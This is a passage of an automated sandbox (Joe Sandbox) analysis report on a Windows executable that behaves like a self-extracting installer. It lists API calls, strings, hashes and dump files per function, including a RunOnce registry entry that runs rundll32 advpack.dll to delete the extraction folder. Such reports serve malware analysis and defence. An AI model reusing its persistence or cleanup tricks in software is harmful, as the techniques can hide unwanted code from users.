advpack.dll, xrefs: 004C2109
DelNodeRunDLL32, xrefs: 004C212E
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C21A8, 004C2204

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-217856272
Opcode ID: 406266717ae9164cb0b100582b79e8a4deffb0ac35ab6920b11f2ebc7f7cdf9a
Instruction ID: 9683d0317a90539580e0e66fec3fe4c495544a42b175df5c202d400abd2fb1f3
Opcode Fuzzy Hash: 406266717ae9164cb0b100582b79e8a4deffb0ac35ab6920b11f2ebc7f7cdf9a
Instruction Fuzzy Hash: 61511579A00218ABDBA09F21DC4DFFB776CEB44744F1441BEBA09E2151DEF88D458A68

Uniqueness

Uniqueness Score: -1.00%

Function 004C55A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 004C55CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 004C5638
LocalFree.KERNEL32(00000000), ref: 004C564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 004C5620

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Part of subcall function 004C6285: GetLastError.KERNEL32(004C5BBC), ref: 004C6285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 004C56B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 004C571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 004C5737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 004C57CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 004C57EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 004C5802

Part of subcall function 004C2630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 004C2654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 004C5830

Part of subcall function 004C6517: FindResourceA.KERNEL32(004C0000,000007D6,00000005), ref: 004C652A
Part of subcall function 004C6517: LoadResource.KERNEL32(004C0000,00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 004C6538
Part of subcall function 004C6517: DialogBoxIndirectParamA.USER32(004C0000,00000000,00000547,004C19E0,00000000), ref: 004C6557
Part of subcall function 004C6517: FreeResource.KERNEL32(00000000,?,?,004C2EE8,00000000,004C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 004C6560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 004C5878

Part of subcall function 004C597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004C59A8
Part of subcall function 004C597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 004C59AF

Strings

RUNPROGRAM, xrefs: 004C55BD, 004C5600
<None>, xrefs: 004C5632
msdownld.tmp, xrefs: 004C57D3
A:\, xrefs: 004C56F4
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C56AE, 004C56B3, 004C583D
Z, xrefs: 004C570A

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1384155332
Opcode ID: 795e34a3092823eea89265c82cb0adc7d76525a2f8e2eb1d5df084605fc9fd48
Instruction ID: 092e3c0e89bae8bc8daaedc413e179a5d248e55d263b15c65712f699b16aeab6
Opcode Fuzzy Hash: 795e34a3092823eea89265c82cb0adc7d76525a2f8e2eb1d5df084605fc9fd48
Instruction Fuzzy Hash: E981F77CA04A045ADBE4AB328C45FEF72599B51348F0400BFF586D2291DF7CADC28A2D

Uniqueness

Uniqueness Score: -1.00%

Function 004C2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004C2CD9
memset.MSVCRT ref: 004C2CE9
memset.MSVCRT ref: 004C2CF9

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 004C2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 004C2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 004C2DBD
CloseHandle.KERNEL32(smo,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 004C2E0A

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Strings

TITLE, xrefs: 004C2D09
smo, xrefs: 004C2D04, 004C2DD9, 004C2DF0
VERCHECK, xrefs: 004C2E54
INSTANCECHECK, xrefs: 004C2D95
EXTRACTOPT, xrefs: 004C2D4D

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$smo
API String ID: 1002816675-4137116347
Opcode ID: 02d525af517b5c4e022a417bb761fbf8c3dc7f05532445d34ea57a256cabc45c
Instruction ID: 16856900f400e29e7fad03732bc97fed4076003e2f5a2fdfc1e823e0827c259e
Opcode Fuzzy Hash: 02d525af517b5c4e022a417bb761fbf8c3dc7f05532445d34ea57a256cabc45c
Instruction Fuzzy Hash: C551B17C2403056BE7E46B269E4AF7B2698EB85714F14403FB941E52E1DEFC8C41962D

Uniqueness

Uniqueness Score: -1.00%

Function 004C597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 004C59A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 004C59AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 004C5A13
MulDiv.KERNEL32(?,?,00000400), ref: 004C5A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 004C5A64
memset.MSVCRT ref: 004C5A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 004C5A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 004C5AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 004C5BFC

Part of subcall function 004C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 004C4518
Part of subcall function 004C44B9: MessageBoxA.USER32(?,?,smo,00010010), ref: 004C4554

Part of subcall function 004C6285: GetLastError.KERNEL32(004C5BBC), ref: 004C6285

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 743903e51367868641b047a7d29b66bdc91dfc3498b254b6397e1a970bf1e8c5
Instruction ID: 5a2392f4d9f89f161c715d65aa2b96316aa5a9fb88d21c0983dd8ac6227862d8
Opcode Fuzzy Hash: 743903e51367868641b047a7d29b66bdc91dfc3498b254b6397e1a970bf1e8c5
Instruction Fuzzy Hash: 4471A7B590060CAFDB959F21CC85FFF77ACEB48344F1440AEF405D6240EA38AE858B29

Uniqueness

Uniqueness Score: -1.00%

Function 004C4FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46A0
Part of subcall function 004C468F: SizeofResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46A9
Part of subcall function 004C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 004C46C3
Part of subcall function 004C468F: LoadResource.KERNEL32(00000000,00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46CC
Part of subcall function 004C468F: LockResource.KERNEL32(00000000,?,004C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46D3
Part of subcall function 004C468F: memcpy_s.MSVCRT ref: 004C46E5
Part of subcall function 004C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 004C46EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 004C4FFE
LoadResource.KERNEL32(00000000,00000000), ref: 004C5006
LockResource.KERNEL32(00000000), ref: 004C500D
GetDlgItem.USER32(00000000,00000842), ref: 004C5030
ShowWindow.USER32(00000000), ref: 004C5037
GetDlgItem.USER32(00000841,00000005), ref: 004C504A
ShowWindow.USER32(00000000), ref: 004C5051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 004C5111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 004C5159

Strings

CABINET, xrefs: 004C4FE6, 004C4FF7
*MEMCAB, xrefs: 004C50C7

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 1ef91f14df77e5d28225ed9f5ca446108034a59c4331ce78c53b52005df2b0d6
Instruction ID: 93bd254ba3896b1ea4ea3c711fc40c6bee58481f41dde63435bcec82d415fb59
Opcode Fuzzy Hash: 1ef91f14df77e5d28225ed9f5ca446108034a59c4331ce78c53b52005df2b0d6
Instruction Fuzzy Hash: C93129B86407157FE7D05F62AD8EF2B365CA784758F18003EF901922A1DEBC9C40865C

Uniqueness

Uniqueness Score: -1.00%

Function 004C53A1 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 71
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C171E: _vsnprintf.MSVCRT ref: 004C1750

RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C53FB
GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5402
GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C541F
DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C542B
CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5434
CreateDirectoryA.KERNELBASE(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5452

Strings

IXP%03d.TMP, xrefs: 004C53C0
IXP, xrefs: 004C5419
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C53B7, 004C53E1, 004C541E

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: DirectoryFile$Create$AttributesDeleteNameRemoveTemp_vsnprintf
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$IXP$IXP%03d.TMP
API String ID: 1082909758-957705000
Opcode ID: 11ceff585dcb8a8b7b974a211c90b717979fde6df8945d090aed20eb45b16184
Instruction ID: 2c440a997fdaf7f270c71264e2543d574ad09818ee56f20d96d689c468a92fbb
Opcode Fuzzy Hash: 11ceff585dcb8a8b7b974a211c90b717979fde6df8945d090aed20eb45b16184
Instruction Fuzzy Hash: A911087530050467E3949F279C49FAF365DEBC6319F10003EF546D22A1CE78899686AD

Uniqueness

Uniqueness Score: -1.00%

Function 004C5467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C54C9
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C553D
RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C556F

Part of subcall function 004C53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C53FB
Part of subcall function 004C53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5402
Part of subcall function 004C53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C541F
Part of subcall function 004C53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C542B
Part of subcall function 004C53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5434

Strings

i386, xrefs: 004C54FE
ppc, xrefs: 004C54E9
alpha, xrefs: 004C54F0
mips, xrefs: 004C54F7
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C547D, 004C5481, 004C54AB, 004C551C, 004C553C, 004C5568

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$alpha$i386$mips$ppc
API String ID: 1979080616-772166365
Opcode ID: 84201fa8a623249fcc3a995ce44f8f151a388a072eae513e84b174b8bb614c0c
Instruction ID: e8a67fcba57e482cce65f9e7ea70dbc281f22bec0ccb9aa391c0abb5261a8854
Opcode Fuzzy Hash: 84201fa8a623249fcc3a995ce44f8f151a388a072eae513e84b174b8bb614c0c
Instruction Fuzzy Hash: 7A31287C700A047BDBD05F269C49F7F739AAB81348B14413FA80592669DF7CEE81869D

Uniqueness

Uniqueness Score: -1.00%

Function 004C256D Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 75
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,004C4096,004C4096,?,004C1ED3,00000001,00000000,?,?,004C4137,?), ref: 004C25B2
RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,004C4096,?,004C1ED3,00000001,00000000,?,?,004C4137,?,004C4096), ref: 004C25CB
RegCloseKey.KERNELBASE(?,?,004C1ED3,00000001,00000000,?,?,004C4137,?,004C4096), ref: 004C25DD
RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,004C4096,004C4096,?,004C1ED3,00000001,00000000,?,?,004C4137,?), ref: 004C25FF
RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,004C4096,00000000,00000000,00000000,00000000,?,004C1ED3,00000001,00000000), ref: 004C261A

Strings

PendingFileRenameOperations, xrefs: 004C25C3
System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 004C25F5
System\CurrentControlSet\Control\Session Manager, xrefs: 004C25A8

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: OpenQuery$CloseInfoValue
String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
API String ID: 2209512893-559176071
Opcode ID: f351b0ca76301f075292894207f563f2c3499ee1cac8b33c8c9d75e66c97b5ce
Instruction ID: 4b869ca0d4d03078adfafbf0a5a4f967ce2b2b5225258b5010054efed0bf60a6
Opcode Fuzzy Hash: f351b0ca76301f075292894207f563f2c3499ee1cac8b33c8c9d75e66c97b5ce
Instruction Fuzzy Hash: D7119B39902128BB9BA0DB929D0DEFB7F7CEF01795F10405AB809E2100DAB44E44D6A5

Uniqueness

Uniqueness Score: -1.00%

Function 004C6A60 Relevance: 13.6, APIs: 9, Instructions: 138
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004C7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 004C7182
Part of subcall function 004C7155: GetCurrentProcessId.KERNEL32 ref: 004C7191
Part of subcall function 004C7155: GetCurrentThreadId.KERNEL32 ref: 004C719A
Part of subcall function 004C7155: GetTickCount.KERNEL32 ref: 004C71A3
Part of subcall function 004C7155: QueryPerformanceCounter.KERNEL32(?), ref: 004C71B8

GetStartupInfoW.KERNEL32(?,004C72B8,00000058), ref: 004C6A7F
Sleep.KERNEL32(000003E8), ref: 004C6AB4
_amsg_exit.MSVCRT ref: 004C6AC9
_initterm.MSVCRT ref: 004C6B1D
__IsNonwritableInCurrentImage.LIBCMT ref: 004C6B49
exit.KERNELBASE ref: 004C6BBF
_ismbblead.MSVCRT ref: 004C6BDA

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
String ID:
API String ID: 836923961-0
Opcode ID: c7e62319ddd46c5f1a160efd6b6369e97545db67040faa8029de344c0dac6e8c
Instruction ID: e40ef9f1868c76e9972dd73692f64ec3e6abc112432737e9960817e0a91bffe9
Opcode Fuzzy Hash: c7e62319ddd46c5f1a160efd6b6369e97545db67040faa8029de344c0dac6e8c
Instruction Fuzzy Hash: AD41D0389442349BDBE0AB699C04F6A77E4EB84724F26803FE841E3391DF7C5C418A9D

Uniqueness

Uniqueness Score: -1.00%

Function 004C58C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74
memoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,004C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C58E7
CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,004C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5943
LocalFree.KERNEL32(00000000,?,004C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C594D
CloseHandle.KERNEL32(00000000,?,004C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C595C
GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,004C5534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 004C5963

Strings

TMP4351$.TMP, xrefs: 004C5923
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 004C58CD, 004C58CF, 004C5919, 004C5962

Memory Dump Source

Source File: 00000001.00000002.1747785314.00000000004C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000001.00000002.1747767987.00000000004C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747882128.00000000004C8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.1747906103.00000000004CC000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4c0000_TE0FN83.jbxd

Similarity

API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
API String ID: 747627703-3033780695
Opcode ID: fc2990f33347fe08f7b37b607d749fc8a516f3feab59669f9437fdcf198acb2d
Instruction ID: f0946e0a24be923a79ecc47b4b0b76de421ed5a890a139408669602f544c592f
Opcode Fuzzy Hash: fc2990f33347fe08f7b37b607d749fc8a516f3feab59669f9437fdcf198acb2d
Instruction Fuzzy Hash: 9B117B7560021477D7A42F7A5C0DF9B7E9DDF8A368B10066EF509D32D1CE789C0182AC

Uniqueness

Uniqueness Score: -1.00%

Function 004C3FEF Relevance: 10.6, APIs: 7, Instructions: 97
processsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

